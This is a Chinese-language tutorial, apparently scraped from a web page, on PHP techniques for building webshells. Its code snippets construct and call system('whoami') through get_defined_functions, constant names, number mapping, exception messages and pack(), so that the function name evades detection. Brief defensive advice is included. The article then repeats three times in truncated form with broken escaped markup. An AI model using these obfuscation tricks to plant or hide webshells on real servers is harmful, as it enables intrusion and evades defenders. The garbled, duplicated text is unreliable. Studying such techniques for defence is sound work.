WebShell构造技术：恶意函数获取方法详解<\/h1>

前言<\/h2>
本文详细总结了几种在PHP环境中获取恶意函数的技术手段，这些技术可用于WebShell构造，帮助安全研究人员理解攻击手法并加强防御。<\/p>

1. 使用get_defined_functions获取内部函数<\/h2>
`get_defined_functions()<\/code>是PHP内置函数，返回所有已定义函数的数组，包括内部(internal)和用户定义(user)函数。<\/p>`

技术要点：<\/h3>

函数原型：get_defined_functions(): array<\/code><\/li>
返回数组包含两个键："internal"和"user"<\/li>
可通过索引直接调用危险函数<\/li>
<\/ul>
<?<\/span>php<\/span>
<\/span><\/span>$a =<\/span> (get_defined_functions<\/span>());
<\/span><\/span>$a["internal"<\/span>][516<\/span>]("whoami"<\/span>); \/\/ 假设516是system函数的索引
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. 利用get_defined_constants获取常量<\/h2>
get_defined_constants()<\/code>返回所有常量的关联数组，键是常量名，值是常量值。<\/p>
技术要点：<\/h3>

可搜索包含特定关键字的常量<\/li>
通过字符串截取获取函数名<\/li>
<\/ul>
<?<\/span>php<\/span>
<\/span><\/span>$a =<\/span> get_defined_constants<\/span>();
<\/span><\/span>foreach<\/span> ($a as<\/span> $key =><\/span> $value){
<\/span><\/span>    if<\/span> (substr<\/span>($key,0<\/span>,7<\/span>)==<\/span>"INI_SYS"<\/span>){
<\/span><\/span>        $x =<\/span> strtolower<\/span>(substr<\/span>($key,4<\/span>,6<\/span>)); \/\/ 提取"system"
<\/span><\/span><\/span><\/span>        $x("whoami"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. 自定义函数构造法<\/h2>
通过自定义函数从数字构造出函数名，典型的混淆技术。<\/p>
示例代码：<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> fun<\/span>($a){
<\/span><\/span>    $s =<\/span> ['a'<\/span>,'t'<\/span>,'s'<\/span>, 'y'<\/span>, 'm'<\/span>, 'e'<\/span>];
<\/span><\/span>    $tmp =<\/span> ""<\/span>;
<\/span><\/span>    while<\/span> ($a><\/span>10<\/span>) {
<\/span><\/span>        $tmp .=<\/span> $s[$a%<\/span>10<\/span>];
<\/span><\/span>        $a =<\/span> $a\/<\/span>10<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $tmp.<\/span>$s[$a];
<\/span><\/span>}
<\/span><\/span>echo<\/span> fun<\/span>(451232<\/span>); \/\/ 输出"system"
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>4. 异常处理截取字符串<\/h2>
利用异常类的getMessage()<\/code>方法获取构造的函数名。<\/p>
技术要点：<\/h3>

使用ParseError<\/code>等异常类<\/li>
通过异常消息获取构造的字符串<\/li>
<\/ul>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> fun<\/span>($a){
<\/span><\/span>    $s =<\/span> ['a'<\/span>,'t'<\/span>,'s'<\/span>, 'y'<\/span>, 'm'<\/span>, 'e'<\/span>];
<\/span><\/span>    $tmp =<\/span> ""<\/span>;
<\/span><\/span>    while<\/span> ($a><\/span>10<\/span>) {
<\/span><\/span>        $tmp .=<\/span> $s[$a%<\/span>10<\/span>];
<\/span><\/span>        $a =<\/span> $a\/<\/span>10<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $tmp.<\/span>$s[$a];
<\/span><\/span>}
<\/span><\/span>$a =<\/span> new<\/span> ParseError<\/span>(fun<\/span>(451232<\/span>));
<\/span><\/span>echo<\/span> $a-><\/span>getMessage<\/span>(); \/\/ 获取"system"
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>5. 文件系统迭代器获取<\/h2>
利用DirectoryIterator<\/code>或FilesystemIterator<\/code>类，通过文件名构造函数。<\/p>
技术要点：<\/h3>

DirectoryIterator::getFilename()<\/code>获取文件名<\/li>
控制文件名或目录名来构造函数<\/li>
<\/ul>
<?<\/span>php<\/span>
<\/span><\/span>$iterator =<\/span> new<\/span> FilesystemIterator<\/span>(dirname<\/span>(__FILE__<\/span>));
<\/span><\/span>foreach<\/span> ($iterator as<\/span> $item) {
<\/span><\/span>    echo<\/span> $item-><\/span>getFilename<\/span>() .<\/span> "<\/span>\n<\/span>"<\/span>; \/\/ 可能获取有用函数名
<\/span><\/span><\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>6. pack函数构造字符串<\/h2>
使用pack()<\/code>函数从ASCII码或十六进制构造字符串。<\/p>
两种构造方式：<\/h3>

通过ASCII码构造：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>echo<\/span> pack<\/span>("C6"<\/span>, 115<\/span>, 121<\/span>, 115<\/span>, 116<\/span>, 101<\/span>, 109<\/span>); \/\/ "system"
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
通过十六进制构造：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>echo<\/span> pack<\/span>("H*"<\/span>, "73797374656d"<\/span>); \/\/ "system"
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>格式说明：<\/h3>

"C6"：6个无符号字符(ASCII码)<\/li>
"H*"：任意长度的十六进制字符串<\/li>
<\/ul>
防御建议<\/h2>

禁用危险函数如system<\/code>、exec<\/code>等<\/li>
监控get_defined_functions<\/code>等函数的使用<\/li>
限制异常信息的输出<\/li>
控制文件系统操作权限<\/li>
对pack<\/code>等数据打包函数进行监控<\/li>
<\/ol>
总结<\/h2>
本文介绍了多种获取恶意函数的技术，从直接获取到间接构造，展示了攻击者如何绕过限制执行恶意代码。理解这些技术有助于更好地防御WebShell攻击。<\/p>

WebShell构造技术：恶意函数获取方法详解<\/h1>

前言<\/h2>
本文详细总结了几种在PHP环境中获取恶意函数的技术手段，这些技术可用于WebShell构造，帮助安全研究人员理解攻击手法并加强防御。<\/p>

1. 使用get_defined_functions获取内部函数<\/h2>
`get_defined_functions()<\/code>是PHP内置函数，返回所有已定义函数的数组，包括内部(internal)和用户定义(user)函数。<\/p>`

2. 利用get_defined_constants获取常量<\/h2>
`get_defined_constants()<\/code>返回所有常量的关联数组，键是常量名，值是常量值。<\/p>`

3. 自定义函数构造法<\/h2>
通过自定义函数从数字构造出函数名，典型的混淆技术。<\/p>

4. 异常处理截取字符串<\/h2>
利用异常类的`getMessage()<\/code>方法获取构造的函数名。<\/p>`

5. 文件系统迭代器获取<\/h2>
利用`DirectoryIterator<\/code>或FilesystemIterator<\/code>类，通过文件名构造函数。<\/p>`

6. pack函数构造字符串<\/h2>
使用`pack()<\/code>函数从ASCII码或十六进制构造字符串。<\/p>`

总结<\/h2>
本文介绍了多种获取恶意函数的技术，从直接获取到间接构造，展示了攻击者如何绕过限制执行恶意代码。理解这些技术有助于更好地防御WebShell攻击。<\/p>

WebShell构造技术：恶意函数获取方法详解<\/h1>

前言<\/h2> 本文详细总结了几种在PHP环境中获取恶意函数的技术手段，这些技术可用于WebShell构造，帮助安全研究人员理解攻击手法并加强防御。<\/p>

1. 使用get_defined_functions获取内部函数<\/h2> get_defined_functions()<\/code>是PHP内置函数，返回所有已定义函数的数组，包括内部(internal)和用户定义(user)函数。<\/p>

2. 利用get_defined_constants获取常量<\/h2> get_defined_constants()<\/code>返回所有常量的关联数组，键是常量名，值是常量值。<\/p>

3. 自定义函数构造法<\/h2> 通过自定义函数从数字构造出函数名，典型的混淆技术。<\/p>

4. 异常处理截取字符串<\/h2> 利用异常类的getMessage()<\/code>方法获取构造的函数名。<\/p>

5. 文件系统迭代器获取<\/h2> 利用DirectoryIterator<\/code>或FilesystemIterator<\/code>类，通过文件名构造函数。<\/p>

6. pack函数构造字符串<\/h2> 使用pack()<\/code>函数从ASCII码或十六进制构造字符串。<\/p>

总结<\/h2> 本文介绍了多种获取恶意函数的技术，从直接获取到间接构造，展示了攻击者如何绕过限制执行恶意代码。理解这些技术有助于更好地防御WebShell攻击。<\/p>

前言<\/h2>
本文详细总结了几种在PHP环境中获取恶意函数的技术手段，这些技术可用于WebShell构造，帮助安全研究人员理解攻击手法并加强防御。<\/p>

1. 使用get_defined_functions获取内部函数<\/h2>
`get_defined_functions()<\/code>是PHP内置函数，返回所有已定义函数的数组，包括内部(internal)和用户定义(user)函数。<\/p>`

2. 利用get_defined_constants获取常量<\/h2>
`get_defined_constants()<\/code>返回所有常量的关联数组，键是常量名，值是常量值。<\/p>`

3. 自定义函数构造法<\/h2>
通过自定义函数从数字构造出函数名，典型的混淆技术。<\/p>

4. 异常处理截取字符串<\/h2>
利用异常类的`getMessage()<\/code>方法获取构造的函数名。<\/p>`

5. 文件系统迭代器获取<\/h2>
利用`DirectoryIterator<\/code>或FilesystemIterator<\/code>类，通过文件名构造函数。<\/p>`

6. pack函数构造字符串<\/h2>
使用`pack()<\/code>函数从ASCII码或十六进制构造字符串。<\/p>`

总结<\/h2>
本文介绍了多种获取恶意函数的技术，从直接获取到间接构造，展示了攻击者如何绕过限制执行恶意代码。理解这些技术有助于更好地防御WebShell攻击。<\/p>